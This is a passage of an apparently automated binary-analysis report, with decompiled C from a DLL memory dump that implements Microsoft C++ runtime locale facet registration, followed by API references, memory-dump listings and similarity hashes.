																																																				E6E1C6653(_t902 - 0x14, 0);
																																																				_t877 =  *0x6e286dfc; // 0x0
																																																				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																				 *(_t902 - 0x10) = _t877;
																																																				_t501 = E6E1A161C(0x6e286da8);
																																																				_t752 =  *((intOrPtr*)(_t902 + 8));
																																																				_t856 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t501);
																																																				__eflags = _t856;
																																																				if(_t856 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t902 - 0x14);
																																																					return E6E1E0075(_t856);
																																																				} else {
																																																					__eflags = _t877;
																																																					if(_t877 == 0) {
																																																						_push( *((intOrPtr*)(_t902 + 8)));
																																																						_push(_t902 - 0x10);
																																																						__eflags = E6E1D14EC(_t637, _t752, _t838, _t856, _t877) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t902 - 0x20);
																																																							E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t637, _t856, _t877, 0x14);
																																																							E6E1C6653(_t902 - 0x14, 0);
																																																							_t878 =  *0x6e286dcc; // 0x0
																																																							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																							 *(_t902 - 0x10) = _t878;
																																																							_t514 = E6E1A161C(0x6e286d80);
																																																							_t759 =  *((intOrPtr*)(_t902 + 8));
																																																							_t857 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t514);
																																																							__eflags = _t857;
																																																							if(_t857 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t902 - 0x14);
																																																								return E6E1E0075(_t857);
																																																							} else {
																																																								__eflags = _t878;
																																																								if(_t878 == 0) {
																																																									_push( *((intOrPtr*)(_t902 + 8)));
																																																									_push(_t902 - 0x10);
																																																									__eflags = E6E1D1558(_t637, _t759, _t838, _t857, _t878) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1A1438(_t902 - 0x20);
																																																										E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e2283cf, _t637, _t857, _t878, 0x14);
																																																										E6E1C6653(_t902 - 0x14, 0);
																																																										_t879 =  *0x6e286e00; // 0x0
																																																										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																										 *(_t902 - 0x10) = _t879;
																																																										_t527 = E6E1A161C(0x6e286dac);
																																																										_t766 =  *((intOrPtr*)(_t902 + 8));
																																																										_t858 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t527);
																																																										__eflags = _t858;
																																																										if(_t858 != 0) {
																																																											L131:
																																																											E6E1C66BA(_t902 - 0x14);
																																																											return E6E1E0075(_t858);
																																																										} else {
																																																											__eflags = _t879;
																																																											if(_t879 == 0) {
																																																												_push( *((intOrPtr*)(_t902 + 8)));
																																																												_push(_t902 - 0x10);
																																																												__eflags = E6E1D15C4(_t637, _t766, _t838, _t858, _t879) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1A1438(_t902 - 0x20);
																																																													E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																													asm("int3");
																																																													E6E1E00AC(0x6e2283cf, _t637, _t858, _t879, 0x14);
																																																													E6E1C6653(_t902 - 0x14, 0);
																																																													_t880 =  *0x6e286dd0; // 0x0
																																																													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																													 *(_t902 - 0x10) = _t880;
																																																													_t540 = E6E1A161C(0x6e286d60);
																																																													_t773 =  *((intOrPtr*)(_t902 + 8));
																																																													_t859 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t540);
																																																													__eflags = _t859;
																																																													if(_t859 != 0) {
																																																														L138:
																																																														E6E1C66BA(_t902 - 0x14);
																																																														return E6E1E0075(_t859);
																																																													} else {
																																																														__eflags = _t880;
																																																														if(_t880 == 0) {
																																																															_push( *((intOrPtr*)(_t902 + 8)));
																																																															_push(_t902 - 0x10);
																																																															__eflags = E6E1D162A(_t637, _t773, _t838, _t859, _t880) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																_t777 = _t902 - 0x20;
																																																																E6E1A1438(_t777);
																																																																E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																																asm("int3");
																																																																E6E1E00AC(0x6e22851f, _t637, _t859, _t880, 4);
																																																																_t881 = _t777;
																																																																 *(_t902 - 0x10) = _t881;
																																																																 *((intOrPtr*)(_t881 + 4)) =  *((intOrPtr*)(_t902 + 0xc));
																																																																_push( *((intOrPtr*)(_t902 + 0x14)));
																																																																_t287 = _t902 - 4;
																																																																 *_t287 =  *(_t902 - 4) & 0x00000000;
																																																																__eflags =  *_t287;
																																																																 *_t881 = 0x6e22c0c4;
																																																																 *((char*)(_t881 + 0x28)) =  *((intOrPtr*)(_t902 + 0x10));
																																																																E6E1D542F(_t637, _t777, _t838, _t859, _t881,  *_t287);
																																																																return E6E1E0075(_t881,  *((intOrPtr*)(_t902 + 8)));
																																																															} else {
																																																																_t859 =  *(_t902 - 0x10);
																																																																 *(_t902 - 0x10) = _t859;
																																																																 *(_t902 - 4) = 1;
																																																																E6E1C6FD3(__eflags, _t859);
																																																																 *0x6e22a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t859 + 4))))();
																																																																 *0x6e286dd0 = _t859;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t859 = _t880;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t858 =  *(_t902 - 0x10);
																																																													 *(_t902 - 0x10) = _t858;
																																																													 *(_t902 - 4) = 1;
																																																													E6E1C6FD3(__eflags, _t858);
																																																													 *0x6e22a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t858 + 4))))();
																																																													 *0x6e286e00 = _t858;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t858 = _t879;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t857 =  *(_t902 - 0x10);
																																																										 *(_t902 - 0x10) = _t857;
																																																										 *(_t902 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t857);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t857 + 4))))();
																																																										 *0x6e286dcc = _t857;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t857 = _t878;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t856 =  *(_t902 - 0x10);
																																																							 *(_t902 - 0x10) = _t856;
																																																							 *(_t902 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t856);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t856 + 4))))();
																																																							 *0x6e286dfc = _t856;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t856 = _t877;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t855 =  *(_t902 - 0x10);
																																																				 *(_t902 - 0x10) = _t855;
																																																				 *(_t902 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t855);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t855 + 4))))();
																																																				 *0x6e286de0 = _t855;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t855 = _t876;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t854 =  *(_t902 - 0x10);
																																																	 *(_t902 - 0x10) = _t854;
																																																	 *(_t902 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t854);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t854 + 4))))();
																																																	 *0x6e286ddc = _t854;
																																																	goto L103;
																																																}
																																															} else {
																																																_t854 = _t875;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t853 =  *(_t902 - 0x10);
																																														 *(_t902 - 0x10) = _t853;
																																														 *(_t902 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t853);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t853 + 4))))();
																																														 *0x6e286db0 = _t853;
																																														goto L96;
																																													}
																																												} else {
																																													_t853 = _t874;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t852 =  *(_t902 - 0x10);
																																											 *(_t902 - 0x10) = _t852;
																																											 *(_t902 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t852);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t852 + 4))))();
																																											 *0x6e286dd8 = _t852;
																																											goto L89;
																																										}
																																									} else {
																																										_t852 = _t873;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t851 =  *(_t902 - 0x10);
																																								 *(_t902 - 0x10) = _t851;
																																								 *(_t902 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t851);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t851 + 4))))();
																																								 *0x6e286dc4 = _t851;
																																								goto L82;
																																							}
																																						} else {
																																							_t851 = _t872;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t850 =  *(_t902 - 0x10);
																																					 *(_t902 - 0x10) = _t850;
																																					 *(_t902 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t850);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t850 + 4))))();
																																					 *0x6e286dc8 = _t850;
																																					goto L75;
																																				}
																																			} else {
																																				_t850 = _t871;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t849 =  *(_t902 - 0x10);
																																		 *(_t902 - 0x10) = _t849;
																																		 *(_t902 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t849);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t849 + 4))))();
																																		 *0x6e286df4 = _t849;
																																		goto L68;
																																	}
																																} else {
																																	_t849 = _t870;
																																	goto L68;
																																}
																															}
																														} else {
																															_t848 =  *(_t902 - 0x10);
																															 *(_t902 - 0x10) = _t848;
																															 *(_t902 - 4) = 1;
																															E6E1C6FD3(__eflags, _t848);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t848 + 4))))();
																															 *0x6e286df8 = _t848;
																															goto L61;
																														}
																													} else {
																														_t848 = _t869;
																														goto L61;
																													}
																												}
																											} else {
																												_t847 =  *(_t902 - 0x10);
																												 *(_t902 - 0x10) = _t847;
																												 *(_t902 - 4) = 1;
																												E6E1C6FD3(__eflags, _t847);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t847 + 4))))();
																												 *0x6e286dc0 = _t847;
																												goto L54;
																											}
																										} else {
																											_t847 = _t868;
																											goto L54;
																										}
																									}
																								} else {
																									_t846 =  *(_t902 - 0x10);
																									 *(_t902 - 0x10) = _t846;
																									 *(_t902 - 4) = 1;
																									E6E1C6FD3(__eflags, _t846);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 4))))();
																									 *0x6e286df0 = _t846;
																									goto L47;
																								}
																							} else {
																								_t846 = _t867;
																								goto L47;
																							}
																						}
																					} else {
																						_t845 =  *(_t902 - 0x10);
																						 *(_t902 - 0x10) = _t845;
																						 *(_t902 - 4) = 1;
																						E6E1C6FD3(__eflags, _t845);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t845 + 4))))();
																						 *0x6e286dbc = _t845;
																						goto L40;
																					}
																				} else {
																					_t845 = _t866;
																					goto L40;
																				}
																			}
																		} else {
																			_t844 =  *(_t902 - 0x10);
																			 *(_t902 - 0x10) = _t844;
																			 *(_t902 - 4) = 1;
																			E6E1C6FD3(__eflags, _t844);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t844 + 4))))();
																			 *0x6e286dec = _t844;
																			goto L33;
																		}
																	} else {
																		_t844 = _t865;
																		goto L33;
																	}
																}
															} else {
																_t843 =  *(_t902 - 0x10);
																 *(_t902 - 0x10) = _t843;
																 *(_t902 - 4) = 1;
																E6E1C6FD3(__eflags, _t843);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t843 + 4))))();
																 *0x6e286db8 = _t843;
																goto L26;
															}
														} else {
															_t843 = _t864;
															goto L26;
														}
													}
												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6E1C6FD3(__eflags, _t842);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6e286de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6E1C6FD3(__eflags, _t841);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6e286dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6E1C6FD3(__eflags, _t840);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6e286db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF03E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF048
int.LIBCPMT ref: 6E1CF05F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1CF082
std::_Facet_Register.LIBCPMT ref: 6E1CF099
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF0D7

Strings

hm(n, xrefs: 6E1CF053

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hm(n
API String ID: 2363045490-1754184310
Opcode ID: e44881d88d9b301e8a5f142395027e792654b7ac311abb894e6c3684c2ed3ddf
Instruction ID: 66446ad53122b2cb91d9852ce40494e5717c218be43e345ec4f3715e5486a554
Opcode Fuzzy Hash: e44881d88d9b301e8a5f142395027e792654b7ac311abb894e6c3684c2ed3ddf
Instruction Fuzzy Hash: 81112C7591051D8BCF01DFD4C854AFEB7BBAF64B14F240809D520E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t858 - 0x14, 0);
				_t819 =  *0x6e286dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6E1A161C(0x6e286b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6E1C66BA(_t858 - 0x14);
					return E6E1E0075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6E1D0E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t858 - 0x20);
							E6E1E3D74(_t858 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t799, _t819, 0x14);
							E6E1C6653(_t858 - 0x14, 0);
							_t820 =  *0x6e286de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6E1A161C(0x6e286d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6E1C66BA(_t858 - 0x14);
								return E6E1E0075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6E1D0EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t858 - 0x20);
										E6E1E3D74(_t858 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t606, _t800, _t820, 0x14);
										E6E1C6653(_t858 - 0x14, 0);
										_t821 =  *0x6e286db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6E1A161C(0x6e286d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6E1C66BA(_t858 - 0x14);
											return E6E1E0075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6E1D0F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t858 - 0x20);
													E6E1E3D74(_t858 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t606, _t801, _t821, 0x14);
													E6E1C6653(_t858 - 0x14, 0);
													_t822 =  *0x6e286dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6E1A161C(0x6e286d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6E1C66BA(_t858 - 0x14);
														return E6E1E0075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6E1D0F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t858 - 0x20);
																E6E1E3D74(_t858 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t606, _t802, _t822, 0x14);
																E6E1C6653(_t858 - 0x14, 0);
																_t823 =  *0x6e286dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6E1A161C(0x6e286d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6E1C66BA(_t858 - 0x14);
																	return E6E1E0075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6E1D0FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t858 - 0x20);
																			E6E1E3D74(_t858 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t606, _t803, _t823, 0x14);
																			E6E1C6653(_t858 - 0x14, 0);
																			_t824 =  *0x6e286df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6E1A161C(0x6e286d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6E1C66BA(_t858 - 0x14);
																				return E6E1E0075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6E1D1057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t858 - 0x20);
																						E6E1E3D74(_t858 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t606, _t804, _t824, 0x14);
																						E6E1C6653(_t858 - 0x14, 0);
																						_t825 =  *0x6e286dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6E1A161C(0x6e286d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6E1C66BA(_t858 - 0x14);
																							return E6E1E0075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6E1D10BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t858 - 0x20);
																									E6E1E3D74(_t858 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t606, _t805, _t825, 0x14);
																									E6E1C6653(_t858 - 0x14, 0);
																									_t826 =  *0x6e286df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6E1A161C(0x6e286da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6E1C66BA(_t858 - 0x14);
																										return E6E1E0075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6E1D1127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t858 - 0x20);
																												E6E1E3D74(_t858 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t606, _t806, _t826, 0x14);
																												E6E1C6653(_t858 - 0x14, 0);
																												_t827 =  *0x6e286df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6E1A161C(0x6e286da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6E1C66BA(_t858 - 0x14);
																													return E6E1E0075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6E1D11AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t858 - 0x20);
																															E6E1E3D74(_t858 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t606, _t807, _t827, 0x14);
																															E6E1C6653(_t858 - 0x14, 0);
																															_t828 =  *0x6e286dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6E1A161C(0x6e286d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6E1C66BA(_t858 - 0x14);
																																return E6E1E0075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6E1D1230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t858 - 0x20);
																																		E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t606, _t808, _t828, 0x14);
																																		E6E1C6653(_t858 - 0x14, 0);
																																		_t829 =  *0x6e286dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6E1A161C(0x6e286d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6E1C66BA(_t858 - 0x14);
																																			return E6E1E0075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6E1D12B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t858 - 0x20);
																																					E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t606, _t809, _t829, 0x14);
																																					E6E1C6653(_t858 - 0x14, 0);
																																					_t830 =  *0x6e286dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6E1A161C(0x6e286d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6E1C66BA(_t858 - 0x14);
																																						return E6E1E0075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6E1D1339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t858 - 0x20);
																																								E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t606, _t810, _t830, 0x14);
																																								E6E1C6653(_t858 - 0x14, 0);
																																								_t831 =  *0x6e286db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6E1A161C(0x6e286d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6E1C66BA(_t858 - 0x14);
																																									return E6E1E0075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6E1D13A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t858 - 0x20);
																																											E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t606, _t811, _t831, 0x14);
																																											E6E1C6653(_t858 - 0x14, 0);
																																											_t832 =  *0x6e286ddc; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6E1A161C(0x6e286d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t448);
